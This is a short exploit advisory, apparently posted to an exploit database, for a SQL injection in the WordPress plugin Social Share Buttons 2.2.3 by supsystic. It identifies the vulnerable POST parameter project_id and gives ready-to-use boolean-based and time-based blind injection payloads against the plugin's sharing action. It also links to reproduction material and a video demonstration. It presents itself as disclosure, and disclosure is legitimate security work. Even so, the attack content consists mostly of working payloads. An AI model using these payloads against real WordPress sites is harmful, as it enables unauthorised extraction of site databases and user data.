Social Share Button 2.2.3 SQL Injection

`## Title: Social Share Buttons-2.2.3 SQLi  
## Author: nu11secur1ty  
## Date: 09.16.2022  
## Vendor: https://wordpress.org/  
## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3  
  
  
## Description:  
The `project_id` parameter from the Social Share Buttons-2.2.3 system  
appears to be vulnerable to SQL injection attacks.  
The malicious user can dump-steal the database, from this system and  
he can use it for very malicious purposes.  
WARNING: The attacker can retrieve all-database from this system!  
NOTE: The users of this system are NOT protected, this SQL  
vulnerability is CRITICAL!  
  
STATUS: HIGH Vulnerability  
  
[+]Payload:  
  
```mysql  
---  
Parameter: project_id (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: action=social-sharing-share&project_id=378116348' or  
'3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id=  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: action=social-sharing-share&project_id=378116348' or  
'3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND  
'KWbC'='KWbC&network_id=5&post_id=  
---  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3)  
  
## Proof and Exploit:  
[href](https://streamable.com/m9r76w)  
  
  
`